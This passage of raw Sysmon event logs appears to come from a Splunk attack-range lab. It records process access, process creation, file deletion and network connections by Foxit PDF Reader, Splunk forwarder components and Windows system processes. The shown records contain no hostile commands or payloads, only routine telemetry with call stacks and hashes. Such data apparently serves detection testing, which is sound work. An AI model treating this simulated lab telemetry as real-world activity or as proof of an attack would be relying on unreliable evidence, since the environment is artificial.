Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64) 10341000x800000000000000040528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.843{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64) 23542300x800000000000000040527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.765{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8932ED7A25338E54A66A1B66EFE6609D,SHA256=A60F87D68BB0F6CFE62DD77EB0F3EB53C62EDC74BFA48411607E9237D1119067,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015476Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:27.118{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50054-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015475Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:28.442{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB8BE85062AD0696CC3CD6643D573B0,SHA256=EBA656E9BE2DE907E97435A112940300B0FDB69D71BFDDBC62C151CB59F43534,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E395-63C7-0C06-00000000AF02}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E395-63C7-0C06-00000000AF02}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.899{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E395-63C7-0C06-00000000AF02}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.900{FE4C2B44-E395-63C7-0C06-00000000AF02}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000015505Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.970{E5A8D418-E395-63C7-E801-00000000B002}27842760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015504Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E395-63C7-E801-00000000B002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015503Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015502Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015501Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015500Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015499Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015498Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015497Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015496Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015495Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015494Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E395-63C7-E801-00000000B002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015493Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.767{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E395-63C7-E801-00000000B002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015492Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.768{E5A8D418-E395-63C7-E801-00000000B002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015491Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.610{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8BF54E86EEE121611576EF06F6377A92,SHA256=8D1AE3BB2265EDE9E54A1D4651013B004533BA0F91D90BB5AA9B47E0AF9F263F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015490Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.526{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program 